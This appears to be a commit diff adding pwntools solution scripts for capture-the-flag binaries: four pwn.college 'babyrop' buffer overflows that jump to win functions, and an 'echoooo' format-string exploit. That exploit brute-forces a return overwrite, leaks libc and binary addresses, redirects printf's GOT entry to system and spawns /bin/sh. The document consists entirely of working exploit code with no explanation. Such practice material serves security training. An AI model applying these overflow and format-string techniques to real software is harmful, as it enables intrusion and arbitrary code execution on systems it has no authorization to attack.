binary

pwn_college/babyrop_level_1.0/a.py

@@ -0,0 +1,20 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+"""
+patchelf --replace-needed libcapstone.so.5 /usr/lib/x86_64-linux-gnu/libcapstone.so.4 babyrop_level_1_0
+"""
+
+context.binary = target = ELF("./babyrop_level_1_0", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# buf
+buf = b"A"*120
+buf += p64(target.sym.win)
+s(buf)
+
+r.interactive()

pwn_college/babyrop_level_1.1/a.py

@@ -0,0 +1,16 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./babyrop_level_1_1", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# buf
+buf = b"A"*136
+buf += p64(target.sym.win)
+s(buf)
+
+r.interactive()

pwn_college/babyrop_level_2.0/a.py

@@ -0,0 +1,21 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+"""
+patchelf --replace-needed libcapstone.so.5 /usr/lib/x86_64-linux-gnu/libcapstone.so.4 babyrop_level_2_0
+"""
+
+context.binary = target = ELF("./babyrop_level_2_0", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# buf
+buf = b"A"*104
+buf += p64(target.sym.win_stage_1)
+buf += p64(target.sym.win_stage_2)
+s(buf)
+
+r.interactive()

pwn_college/babyrop_level_2.1/a.py

@@ -0,0 +1,17 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./babyrop_level_2_1", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# buf
+buf = b"A"*88
+buf += p64(target.sym.win_stage_1)
+buf += p64(target.sym.win_stage_2)
+s(buf)
+
+r.interactive()

random_challs/echoooo/a.py

@@ -0,0 +1,69 @@
+#!/usr/bin/python3
+
+from pwn import *
+import re
+
+context.binary = target = ELF("./chal", checksec=False)
+libc = target.libc
+
+# bruteforce lower 12 bits
+def brute():
+	for a in range(1, 256):
+		for b in range(8, 256, 16):
+			r = process()
+			partial_ret = (a << 8) | b
+			write = (0x61 - (partial_ret & 0xff)) & 0xff
+			buf = b"%c"*16 + f"%{partial_ret-16}c%hn".encode()
+			buf += f"%{write}c%48$hhn".encode()
+			r.sendlineafter(b": ", buf)
+			try:
+				r.recvuntil(b"Type")
+				return r, partial_ret
+			except:
+				r.kill()
+				continue
+
+# leak
+r, partial_ret = brute()
+log.info("ret: %#x", partial_ret)
+buf = f"%97c%48$hhn".encode()
+buf += b"AAAA%17$p.%19$p"
+r.sendlineafter(b": ", buf)
+r.recvuntil(b"AAAA")
+leaks = re.findall(r'0x[a-z0-9]+', r.recvS())
+libc.address = int(leaks[0], 16) - 0x29d68
+log.info("libc: %#x", libc.address)
+target.address = int(leaks[1], 16) - 0x1169 
+log.info("elf: %#x", target.address)
+
+# write
+partial_ret = int(hex(libc.sym.system)[-4:], 16)
+buf = f"%{partial_ret}c%12$hn".encode().ljust(16, b"A") + b"%110c%48$hhn".ljust(16, b"A") + p64(target.got.printf)
+r.sendline(buf)
+r.sendline(b"/bin/sh")
+
+r.interactive()
+
+"""
+# write
+partial_ret = 0xe068
+write = (0x61 - (partial_ret & 0xff)) & 0xff
+buf = b"%c"*16 + f"%{partial_ret-16}c%hn".encode()
+buf += f'%{write}c%48$hhn'.encode()
+s(buf)
+
+# leak
+buf = f"%97c%48$hhn".encode()
+buf += b"AAAA%17$p.%19$p"
+s(buf)
+r.recvuntil(b"AAAA")
+leaks = re.findall(r'0x[a-z0-9]+', r.recvS())
+libc.address = int(leaks[0], 16) - 0x29d68
+target.address = int(leaks[1], 16) - 0x1169 
+log.info("elf: %#x", target.address)
+
+# write
+partial_ret = 0x38f0
+buf = f"%{partial_ret}c%12$hn".encode().ljust(16, b"A") + b"%110c%48$hhn".ljust(16, b"A") + p64(target.got.printf)
+r.sendline(buf)
+"""